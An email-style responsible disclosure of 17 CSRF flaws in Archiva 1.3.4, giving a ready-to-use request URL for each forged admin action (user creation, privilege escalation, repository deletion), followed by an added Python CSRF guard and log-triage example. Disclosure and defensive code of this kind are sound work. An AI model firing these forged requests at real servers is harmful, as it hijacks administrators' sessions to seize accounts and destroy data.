Hi,

The latest version of Archiva (1.3.4) is also vulnerable to multiple
CSRF issues. The following are the details and exploit code. Please
confirm this mail and revert with an update. I will be disclosing this
to the security community after the issues have been fixed.

Project: Archiva
Severity: Critical
Versions: 1.3.4 (other versions may be affected)
Exploit type: Multiple CSRF

CSRF:

An attacker can build a simple html page containing a hidden Image tag
(e.g.: <img src=vulnurl width=0 height=0 />) and entice the administrator
to access the page resulting in the following issues:

1. An attacker can create a new user using the administrator's session:
http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abc

2. An attacker can delete a user:
http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test

3. An attacker can elevate privileges of accounts:
http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit

4. An attacker can delete the Configuration and contents along with the
repository:
http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&;method%3AdeleteContents=Delete+Configuration+and+Contents

5. An attacker can delete an artifact from any repository:
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots

6. An attacker can add a Repository Group:
http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp

7. An attacker can delete a repository Group:
http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm

8. An attacker can disable Proxy connectors:
http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal

9. An attacker can Delete proxy connectors:
http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots

10. An attacker can delete Legacy Artifact Path under Legacy Support:
http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar

11. An attacker can create a New Network Proxy configuration:
http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=

12. An attacker can delete an existing network proxy configuration:
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy

13. An attacker can add custom file extensions to the repository
scanning page:
http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts

14. An attacker can remove an existing file extension from the
repository scanning page:
http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**%2F*.rum&fileTypeId=artifacts

15. An attacker can change the settings on the Known Consumers section:
http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsumers=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums

16. An attacker can enable/disable Unprocessed Consumer settings:
http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project

17. An attacker can change settings on the Cleanup Consumers section:
http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed


I would request you to provide CVE-IDs for the vulnerabilities so that I
can co-ordinate a full disclosure after these issues are fixed.

Warm Regards,
Riyaz Ahemed Walikar || Senior Engineer - Professional Services
Vulnerability Assessment & Penetration Testing
Mobile: +91-98860-42242 || Extn: 5601


The information transmitted is intended only for the person or entity to which 
it is addressed and may contain confidential and/or privileged material. 
Any review, re-transmission, dissemination or other use of or taking of any 
action in reliance upon,this information by persons or entities other than the 
intended recipient is prohibited. 
If you received this in error, please contact the sender and delete the 
material from your computer. 
Microland takes all reasonable steps to ensure that its electronic 
communications are free from viruses. 
However, given Internet accessibility, the Company cannot accept liability for 
any virus introduced by this e-mail or any attachment and you are advised to 
use up-to-date virus checking software. 
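Every item in the report above has the same root cause: a state-changing Struts-style action is reachable with a plain GET carrying only the administrator's session cookie, so a hidden image on a third-party page is enough to trigger it. The block below is an added example, not Archiva's code or the reporter's, showing the two controls a defender would apply in Python: a server-side guard that refuses GET for such actions, checks Origin/Referer against the site's own origin and requires a per-session synchronizer token, plus a triage pass over access-log lines that flags the same pattern after the fact. The request/session dictionary shapes, `SITE_ORIGIN`, the action-name pattern and the log lines are all assumptions constructed for this example.

```python
"""Added example (not Archiva code): CSRF guard and access-log triage.

Assumptions: requests are dicts {method, path, headers, params}; the
session is a dict holding a per-session 'csrf_token'; SITE_ORIGIN is the
deployment origin; the sample log lines are constructed for this example.
"""
import hmac
import re
import secrets
from urllib.parse import urlsplit

SITE_ORIGIN = "http://127.0.0.1:8080"  # assumed deployment origin

# Actions named in the advisory that change state. Struts maps
# "name!method.action" to a method on the action class, hence the "!".
STATE_CHANGING = re.compile(
    r"/archiva/(security/(usercreate|userdelete|addRolesToUser)"
    r"|admin/(delete|add|save|disable|repositoryScanning|database)\w*"
    r"|deleteArtifact)(!\w+)?\.action$"
)


def new_csrf_token() -> str:
    """Synchronizer token: random, stored in the session, echoed in forms."""
    return secrets.token_urlsafe(32)


def is_state_changing(path: str) -> bool:
    return STATE_CHANGING.search(path) is not None


def check_request(request: dict, session: dict) -> tuple:
    """Return (allowed, reason) for one request against its session."""
    path = request["path"]
    if not is_state_changing(path):
        return True, "safe endpoint"
    # 1. A state-changing action must never be reachable via GET; that is
    #    exactly what an <img src=...> tag issues.
    if request["method"].upper() != "POST":
        return False, "state-changing action must be POSTed, not fetched via GET"
    # 2. Origin (or, failing that, Referer) must be our own origin.
    headers = {k.lower(): v for k, v in request.get("headers", {}).items()}
    source = headers.get("origin") or headers.get("referer")
    if source is None:
        return False, "missing Origin/Referer"
    parts = urlsplit(source)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return False, f"cross-site request from {parts.netloc}"
    # 3. The form must carry the session's token; compare in constant time.
    token = request.get("params", {}).get("csrf_token", "")
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(token.encode(), expected.encode()):
        return False, "bad or missing CSRF token"
    return True, "ok"


# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"$'
)

# Constructed sample lines modelled on the advisory's URLs (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - admin [01/Jan/2011:10:00:00 +0000] "GET /archiva/security/userdelete!submit.action?username=test HTTP/1.1" 200 512 "http://third-party.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - admin [01/Jan/2011:10:00:01 +0000] "GET /archiva/admin/deleteRepository.action?repoid=test HTTP/1.1" 200 512 "http://third-party.example/page.html" "Mozilla/5.0"',
    '10.0.0.5 - admin [01/Jan/2011:10:02:00 +0000] "POST /archiva/admin/addRepositoryGroup.action HTTP/1.1" 302 0 "http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action" "Mozilla/5.0"',
    '10.0.0.7 - - [01/Jan/2011:10:03:00 +0000] "GET /archiva/browse.action HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def triage_log(lines) -> list:
    """Flag state-changing actions hit via GET or from an off-site referer.

    Returns (user, method, path, referer) tuples worth an analyst's look.
    """
    site_host = urlsplit(SITE_ORIGIN).netloc
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        if not is_state_changing(path):
            continue
        ref_host = urlsplit(m["referer"]).netloc if m["referer"] != "-" else ""
        if m["method"] == "GET" or ref_host != site_host:
            hits.append((m["user"], m["method"], path, m["referer"]))
    return hits


if __name__ == "__main__":
    for hit in triage_log(SAMPLE_LOG):
        print("suspicious:", hit)
```

The guard deliberately layers three checks: refusing GET on its own already defeats the image-tag vector described in the report, the Origin/Referer check covers auto-submitted cross-site forms, and the token is the check that still holds when a browser sends no Origin or Referer at all. The log triage uses the same action pattern, so the two stay in sync when new actions are added to the list.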
